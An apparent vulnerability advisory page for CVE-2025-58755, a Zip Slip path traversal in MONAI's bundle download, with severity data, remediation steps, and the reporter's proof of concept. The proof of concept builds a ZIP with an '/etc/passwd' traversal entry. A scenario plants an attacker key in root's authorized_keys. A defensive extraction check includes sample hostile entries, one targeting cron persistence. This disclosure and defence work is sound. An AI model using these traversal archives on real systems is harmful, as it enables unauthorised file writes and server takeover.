CVE-2025-58755: MONAI: path traversal allows arbitrary file write

GHSA-x6ww-pf9m-m73m | Severity: HIGH | Public PoC available
Published September 9, 2025
CISO Take

MONAI bundle downloads are vulnerable to Zip Slip: a malicious ZIP hosted anywhere online can write files outside the bundle directory, including over system files, when MONAI downloads and extracts it. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

What is the risk?

High risk for AI/ML teams using MONAI bundle downloads. CVSS 8.8 with network vector, low complexity, and low privileges required. Attack surface is broad: MONAI is prevalent in medical imaging AI pipelines and researchers routinely pull bundles from community sources like HuggingFace, GitHub, and MONAI Hub. An attacker who can host a ZIP (or MITM a download) achieves arbitrary file write without meaningful user interaction beyond the normal bundle workflow. Containerized training environments frequently run as root, amplifying impact.

What systems are affected?

Package   Ecosystem   Vulnerable range   Patched
MONAI     pip         <= 1.5.0           1.5.1

If you run MONAI 1.5.0 or earlier, you're affected; 1.5.1 is the first release with the fix.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 42% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector)        Network
AC (Attack Complexity)    Low
PR (Privileges Required)  Low
UI (User Interaction)     None
S  (Scope)                Unchanged
C  (Confidentiality)      High
I  (Integrity)            High
A  (Availability)         High

What should I do?

5 steps
  1. PATCH

    Upgrade to monai >= 1.5.1 immediately (pip install --upgrade monai).

  2. AUDIT

    Run pip freeze | grep monai across all ML training and inference systems and flag every install at 1.5.0 or earlier.

  3. DETECT

    Review file system audit logs for writes outside bundle extraction directories during MONAI operations. A traversal entry lands relative to the bundle_dir passed to download, so look for files created above that directory around the time of a bundle download.

  4. WORKAROUND (if immediate patch is blocked)

    Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download.

  5. HARDEN

    Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
A.6.1.4 - AI supply chain management
NIST AI RMF
MANAGE 2.2 - Prioritize and apply risk treatments for AI risks
OWASP LLM Top 10
LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-58755?

MONAI bundle downloads are vulnerable to Zip Slip: a malicious ZIP hosted anywhere online can write files outside the bundle directory, including over system files, when MONAI downloads and extracts it. Update to MONAI 1.5.1 immediately. Audit any system where untrusted URLs were passed to MONAI's bundle download function.

Is CVE-2025-58755 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-58755, increasing the risk of exploitation.

How to fix CVE-2025-58755?

1. PATCH: Upgrade to monai >= 1.5.1 immediately (`pip install --upgrade monai`). 2. AUDIT: Run `pip freeze | grep monai` across all ML training and inference systems. 3. DETECT: Review file system audit logs for unexpected writes outside bundle extraction directories during MONAI operations. 4. WORKAROUND (if immediate patch is blocked): Restrict bundle downloads to MONAI's official hosting only; never pass untrusted or user-supplied URLs to monai.bundle.scripts.download. 5. HARDEN: Run MONAI processes as non-root in containers with restricted filesystem mounts; apply seccomp/AppArmor profiles to training containers.

What systems are affected by CVE-2025-58755?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps/CI pipelines.

What is the CVSS score for CVE-2025-58755?

CVE-2025-58755 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.57%.

What is the AI security impact?

Affected AI Architectures

training pipelines, model serving, MLOps/CI pipelines

MITRE ATLAS Techniques

AML.T0002.001 Models
AML.T0010.001 AI Software
AML.T0011.000 Unsafe AI Artifacts
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.6.1.4
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

### Summary

The extractall function `zip_file.extractall(output_dir)` is used directly to process compressed files. It is used in many places in the project. When the Zip file containing malicious content is decompressed, it will overwrite the system files. In addition, the project allows the download of the zip content through the link, which increases the scope of exploitation of this vulnerability.

When reproducing locally, follow the process below to create a malicious zip file and simulate the process of remotely downloading the zip file.

```
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# mkdir -p test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# echo "malicious content" > test_bundle/malicious.txt
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# cd test_bundle
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# zip -r ../malicious.zip . ../../../../../../etc/passwd
  adding: malicious.txt (stored 0%)
  adding: ../../../../../../etc/passwd (deflated 64%)
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm/test_bundle# cd ..
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls
malicious.zip  p1.py  p2.py  r1.py  test_bundle
```

Then start the http service through python

```
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

Another terminal simulates a normal user downloading zip content from the Internet, perhaps from some popular forums or blogs, such as huggingface, etc.

```
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# python -c "from monai.bundle.scripts import download; download(name='test_bundle', url='http://localhost:8000/malicious.zip', bundle_dir='/tmp/test_extract')"
2025-08-11 20:49:01,668 - INFO - --- input summary of monai.bundle.scripts.download ---
2025-08-11 20:49:01,668 - INFO - > name: 'test_bundle'
2025-08-11 20:49:01,668 - INFO - > bundle_dir: '/tmp/test_extract'
2025-08-11 20:49:01,668 - INFO - > source: 'monaihosting'
2025-08-11 20:49:01,668 - INFO - > url: 'http://localhost:8000/malicious.zip'
2025-08-11 20:49:01,668 - INFO - > remove_prefix: 'monai_'
2025-08-11 20:49:01,668 - INFO - > progress: True
2025-08-11 20:49:01,668 - INFO - ---
test_bundle.zip: 8.00kB [00:00, 204kB/s]
2025-08-11 20:49:01,710 - INFO - Downloaded: /tmp/test_extract/test_bundle.zip
2025-08-11 20:49:01,710 - INFO - Expected md5 is None, skip md5 check for file /tmp/test_extract/test_bundle.zip.
2025-08-11 20:49:01,710 - INFO - Writing into directory: /tmp/test_extract.
2025-08-11 20:49:01,711 - WARNING - metadata file not found in /tmp/test_extract/test_bundle/configs/metadata.json.
root@autodl-container-a53c499c18-c5ca272d:~/autodl-tmp/mmm# ls /
autodl-pub cuda-keyring_1.0-1_all.deb home lib32 **malicious.txt** opt run sys var bin dev init lib64 media proc sbin tmp boot etc lib libx32 mnt root srv usr
```

We can see that malicious.txt was indeed extracted to the root directory, demonstrating that the path traversal successfully wrote the malicious file. If the Zip file contains SSH keys, malicious content that automatically loads when the user boots the computer, or overwrites legitimate user files, causing services to become inoperable, these actions could cause extremely serious damage.

### Impact

Arbitrary file write

### Repair Suggestions

Check the contents of the downloaded Zip file, or use a safer method to load it

Exploitation Scenario

Attacker uploads a crafted ZIP to HuggingFace, a research Slack channel, or a community forum frequented by medical AI teams. The ZIP contains an entry with a traversal path (e.g., `../../../../../root/.ssh/authorized_keys`) populated with the attacker's public key. An ML engineer follows a tutorial or colleague recommendation and runs `monai.bundle.scripts.download(url='<attacker-url>', bundle_dir='/tmp/model')`. MONAI downloads and calls `extractall()` without path sanitization, writing the attacker's key into root's authorized_keys. The attacker gains SSH access to a GPU training server, potentially with access to patient imaging datasets and downstream clinical AI model artifacts.
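The following is an added example, not MONAI's code and not the reporter's PoC. It implements the "accept known good" check that the bare `zip_file.extractall(output_dir)` call named in the advisory lacks and that the scenario above abuses: every stored member name is validated against the real path of the bundle directory before a single byte is written, and absolute names, `..` components and symlink entries are all refused. The archive is constructed in memory with the same kinds of entries the scenario describes (an `authorized_keys` traversal, an absolute cron path); the bundle layout, the entry names, `safe_extractall` and `unsafe_members` are illustrative assumptions, not MONAI APIs.

```python
"""Allow-list check for archive members before extraction.

Added example, not MONAI's code. Every stored name must resolve inside
the destination directory; anything else is rejected up front, so a
hostile archive writes nothing at all rather than "almost nothing".
"""
import io
import os
import stat
import tempfile
import zipfile


class UnsafeArchiveMember(ValueError):
    """Raised when a member would be written outside the destination."""


def unsafe_members(zf, dest):
    """Return [(name, reason)] for every entry that must not be extracted.

    Accept-known-good rules: the stored name must be relative, contain no
    '..' component, not be a symlink, and its real path must sit strictly
    under the real path of ``dest`` (the last rule also catches escapes
    through a symlinked directory that already exists under ``dest``).
    """
    dest_real = os.path.realpath(dest)
    rejected = []
    for info in zf.infolist():
        name = info.filename
        if stat.S_ISLNK(info.external_attr >> 16):   # Unix mode is in the high 16 bits
            rejected.append((name, "symlink entry"))
        elif name.startswith(("/", "\\")) or os.path.splitdrive(name)[0]:
            rejected.append((name, "absolute path"))
        elif ".." in name.replace("\\", "/").split("/"):
            rejected.append((name, "parent-directory component"))
        else:
            target = os.path.realpath(os.path.join(dest_real, name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                rejected.append((name, "resolves outside destination"))
    return rejected


def safe_extractall(archive, dest):
    """Validate all members first, then extract; returns the member names.

    Hypothetical drop-in for the bare zip_file.extractall(output_dir) call.
    """
    with zipfile.ZipFile(archive) as zf:
        rejected = unsafe_members(zf, dest)
        if rejected:
            detail = "; ".join(f"{n!r}: {why}" for n, why in rejected)
            raise UnsafeArchiveMember(f"refusing to extract into {dest}: {detail}")
        zf.extractall(dest)
        return zf.namelist()


def build_zip(entries):
    """Build an in-memory ZIP from (name, data, is_symlink) tuples.

    ZipInfo stores the name verbatim, so traversal and absolute names are
    carried exactly as an attacker-built archive would carry them.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data, is_symlink in entries:
            info = zipfile.ZipInfo(name)
            mode = (stat.S_IFLNK | 0o777) if is_symlink else (stat.S_IFREG | 0o644)
            info.external_attr = mode << 16
            zf.writestr(info, data)
    buf.seek(0)
    return buf


# Constructed sample archive: a bundle-shaped layout plus three hostile members.
MALICIOUS_ENTRIES = [
    ("test_bundle/configs/metadata.json", b"{}", False),
    ("test_bundle/models/model.pt", b"not a real model", False),
    ("../../../../root/.ssh/authorized_keys", b"ssh-ed25519 AAAA attacker", False),
    ("/etc/cron.d/persist", b"* * * * * root /tmp/x\n", False),
    ("test_bundle/LICENSE", b"/etc/passwd", True),   # symlink whose target is outside
]
CLEAN_ENTRIES = MALICIOUS_ENTRIES[:2]


def demo():
    """Exercise both archives in a throwaway directory; returns a result dict."""
    result = {}
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "bundle_dir")
        os.makedirs(dest)
        with zipfile.ZipFile(build_zip(MALICIOUS_ENTRIES)) as zf:
            result["rejected"] = dict(unsafe_members(zf, dest))
        try:
            safe_extractall(build_zip(MALICIOUS_ENTRIES), dest)
            result["blocked"] = False
        except UnsafeArchiveMember:
            result["blocked"] = True
        result["written_after_block"] = sorted(os.listdir(dest))   # expect nothing
        result["extracted"] = safe_extractall(build_zip(CLEAN_ENTRIES), dest)
        result["model_present"] = os.path.isfile(
            os.path.join(dest, "test_bundle", "models", "model.pt"))
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two design points. The check runs over the whole member list before extraction starts, so a hostile archive is rejected outright instead of leaving the benign half of a bundle on disk. And the symlink rule matters even though Python's `zipfile` writes symlink entries as plain files: a `bundle_dir` later unpacked or copied with a tool that does recreate links would turn the entry into an escape route. One caveat for triage: CPython's own `zipfile.extractall` has stripped leading separators and `..` components from member names since Python 3.3.1, so on the ZIP path a pre-check like this is defence in depth; it is the real guard for extractors that do not sanitize names, such as `tarfile` before the Python 3.12 data filter.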

Weaknesses (CWE)

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
September 9, 2025
Last Modified
September 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities